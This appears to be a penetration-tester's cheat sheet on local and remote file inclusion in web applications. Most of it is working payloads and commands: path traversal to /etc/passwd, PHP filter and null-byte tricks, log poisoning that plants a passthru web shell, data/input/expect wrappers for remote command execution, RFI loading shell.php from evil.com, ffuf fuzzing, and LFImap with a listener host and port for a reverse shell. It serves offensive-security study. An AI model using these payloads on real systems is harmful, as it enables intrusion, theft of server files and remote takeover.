File Inclusion
Notes about some basic File Insclusion attack
Playground
Dangerous Function
Function
Read Content
Execute
Remote URL
PHP
include()/include_once()
✅
✅
✅
require()/require_once()
✅
✅
❌
file_get_contents()
✅
❌
✅
fopen()/file()
✅
❌
❌
NodeJS
fs.readFile()
✅
❌
❌
fs.sendFile()
✅
❌
❌
res.render()
✅
✅
❌
Java
include
✅
❌
❌
import
✅
✅
✅
.NET
@Html.Partial()
✅
❌
❌
@Html.RemotePartial()
✅
❌
✅
Response.WriteFile()
✅
❌
❌
include
✅
✅
✅
Local File Inclusion (LFI)
Local File Inclusion (LFI) is a type of vulnerability where an attacker can exploit a web application to include files that are already present on the server. By manipulating input parameters, such as URLs or form fields, the attacker can trick the application into loading files from the local file system, potentially accessing sensitive information or executing malicious code.
Basic LFI Payloads
/etc/passwd
Basic LFI
../../../../etc/passwd
LFI with path traversal
/../../../etc/passwd
LFI with name prefix
./languages/../../../../etc/passwd
LFI with approved path
php://filter/read=convert.base64-encode/resource=config
LFI with Base64 Filter
../../../../etc/passwd%00
LFI with Null byte
Log Poisoning to RCE
# Inject Access Log
curl -X "<?php echo passthru(\$_GET['cmd']);?>" http://target.com/
# Access
http://target.com/index.php?page=/var/log/apache2/access.log&cmd=idAccess Log Location
Apache:
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/opt/lampp/logs/access_log
/opt/lampp/logs/error_log
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/www/logs/thttpd_log
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/thttpd_log
/var/www/log/access_log
/var/www/log/error_log
/var/www/logs/access.log
/var/www/logs/access_log
/var/www/logs/error.log
/var/www/logs/error_log
C:\apache\logs\access.log
C:\apache\logs\error.log
C:\Program Files\Apache Group\Apache\logs\access.log
C:\Program Files\Apache Group\Apache\logs\error.log
C:\program files\wamp\apache2\logs
C:\wamp\apache2\logs
C:\wamp\logs
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.logNginx:
/var/log/nginx/access.log
LFI to RCE
# Data Wrappers
http://target.com/index.php?page=/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
# Input Wrappers
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://target.com/index.php?page=php://input&cmd=id"
# Expect Wrappers
curl -s "http://target.com/index.php?page=expect://id"Remote File Inclusion (RFI)
In most languages, including remote URLs is considered as a dangerous practice as it may allow for such vulnerabilities. This is why remote URL inclusion is usually disabled by default. For example, any remote URL inclusion in PHP would require the allow_url_include setting to be enabled.
http://target.com/index.php?page=ftp://user:pass@localhost/shell.php&cmd=id
http://target.com/index.php?page=http://evil.com/shell.php&cmd=idAutomation
# Fuzzing Parameter
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://target.com/index.php?FUZZ=value' -fs 2309
# Check working payload with LFI wordlists
ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://target.com/index.php?view=FUZZ' -fs 2309
# Read Apache2 Conf
curl http://target.com/index.php?view=../../../../../../../../../../../../../../../../../../etc/apache2/apache2.confTools
LFImap
# Install
git clone https://github.com/hansmach1ne/LFImap
cd LFImap/
python3 -m venv lfimap_env
source lfimap_env/bin/activate
pip3 install -r requirements.txt
# Usage
Usage:
python3 lfimap.py --help
python3 lfimap.py -U "http://10.10.70.223/playground.php?page=test" -a
python3 lfimap.py -U "http://10.10.70.223/playground.php?page=test" -x --lhost 10.9.245.106 --lport 443
WordLists
https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Linux
https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Windows
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt
References
Last updated
Was this helpful?